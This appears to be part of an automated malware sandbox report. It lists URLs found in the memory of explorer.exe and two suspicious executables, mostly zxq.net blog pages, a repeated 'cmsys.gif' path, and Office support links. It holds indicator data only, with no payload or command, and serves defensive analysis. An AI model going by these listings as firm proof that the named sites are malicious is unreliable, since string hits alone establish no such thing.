Source: explorer.exe, 00000004.00000003.2048130381.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://schema.org
Source: 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.0000000003893000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.0000000003845000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.000000000286B000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.0000000003A37000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.000000000321B000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.00000000043E3000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.00000000044B9000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.000000000423F000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.00000000041F1000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.0000000004395000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.0000000004266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.0000000003820000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.000000000384B000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.00000000041CC000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.0000000004372000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.000000000439D000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.0000000004494000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.0000000004241000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.00000000041F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.0000000003893000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.0000000003845000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.000000000286B000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.0000000003A37000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.000000000321B000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.00000000043E3000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.00000000044B9000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.000000000423F000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.00000000041F1000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.0000000004395000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.0000000004266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.0000000003820000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.000000000384B000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2960095855.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.00000000041CC000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.0000000004372000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.000000000439D000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.0000000004494000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.0000000004241000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2960207875.00000000041F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: duencaj.exe , 0000003F.00000002.2950015087.0000000003306000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.00000000032F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.0000000002956000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.0000000003306000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: duencaj.exe , 0000003F.00000002.2950015087.00000000032F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/H
Source: 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.0000000002951000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.0000000003301000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lBfq
Source: explorer.exe, 00000004.00000003.2048130381.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://yoast.com/wordpress/plugins/seo/
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/#logo
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/#organization
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/#website
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/4-tips-for-solo-living-in-a-condo/
Source: explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/?p=187
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/?s=
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/about-us/
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/ai-agent-crypto-tokens-in-2025-navigating-the-hype-and-reality/
Source: explorer.exe, 00000004.00000003.2048130381.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938534107.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830603055.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154831486.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830427393.0000000000793000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1817065619.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154831486.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.00000000007AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/cmsys.gif
Source: explorer.exe, 00000004.00000003.2048130381.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938534107.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830603055.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154831486.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.00000000007AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/cmsys.gif;
Source: explorer.exe, 00000004.00000003.2154749279.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007CB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.00000000007AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/cmsys.gife
Source: explorer.exe, 00000004.00000003.1830427393.0000000000793000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/cmsys.gifet
Source: explorer.exe, 00000004.00000003.2048130381.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938534107.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830603055.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154831486.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2047736202.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007CB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.00000000007AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/cmsys.gifn
Source: explorer.exe, 00000004.00000003.1938459691.00000000007CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/cmsys.gifn)
Source: explorer.exe, 00000004.00000003.2047736202.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/cmsys.gifnQ
Source: explorer.exe, 00000004.00000003.2251758293.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/cmsys.gifni
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/condo-design-ideas-for-a-conducive-work-environment/
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/contact-us/
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/experience-luxury-living-at-marina-gardens-condo-the-one-marina-gardens-by-kingsford
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/feed/
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/final-mile-delivery-the-key-to-winning-customer-satisfaction-in-2025/
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/game-bonus-rounds-explained-and-how-they-work/
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/narrative-design-in-games-interactive-storytelling-vs-linear-storylines/
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/news/
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/news/business/
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/news/entertainment/
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/news/science-health/
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/news/technology/
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/privacy-policy/
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/
Source: explorer.exe, 00000004.00000003.2251758293.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/#
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/#breadcrumb
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/#webpage
Source: explorer.exe, 00000004.00000003.2048130381.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007CB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154831486.00000000007C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/(
Source: explorer.exe, 00000004.00000003.2048130381.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154749279.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007CB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154831486.00000000007C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/)
Source: explorer.exe, 00000004.00000003.2251887908.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154831486.00000000007C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/9
Source: explorer.exe, 00000004.00000003.2251758293.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938534107.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938534107.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154749279.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2047736202.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/C:
Source: explorer.exe, 00000004.00000003.1938459691.00000000007CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/H
Source: explorer.exe, 00000004.00000003.2251758293.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2047736202.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/LMEMp
Source: explorer.exe, 00000004.00000003.2251758293.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154749279.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/LMEMp8
Source: explorer.exe, 00000004.00000003.1830261267.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/LMEMpH
Source: explorer.exe, 00000004.00000003.2154749279.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/LMEMpx
Source: explorer.exe, 00000004.00000003.2251887908.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154831486.00000000007C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/N
Source: explorer.exe, 00000004.00000003.2251887908.00000000007C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/O
Source: explorer.exe, 00000004.00000003.2251758293.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/Q
Source: explorer.exe, 00000004.00000003.1830603055.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830427393.0000000000793000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/WC:
Source: explorer.exe, 00000004.00000003.2047736202.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/Z
Source: explorer.exe, 00000004.00000003.2048130381.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007CB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154831486.00000000007C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/_
Source: explorer.exe, 00000004.00000003.2251758293.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154749279.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2047736202.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/h
Source: explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/i
Source: explorer.exe, 00000004.00000003.2251887908.00000000007C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/l
Source: explorer.exe, 00000004.00000003.2048130381.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/m
Source: explorer.exe, 00000004.00000003.2048130381.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938534107.0000000000799000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154831486.00000000007C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/qqC:
Source: explorer.exe, 00000004.00000003.2048130381.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154831486.00000000007C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/r
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/which-hair-transplant-method-is-best-for-you/
Source: explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251758293.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154749279.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2047736202.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2106
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2106
Source: explorer.exe, 00000004.00000003.2048130381.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/themes/smart-mag/css/icons/fonts/ts-icons.woff2?v2.2
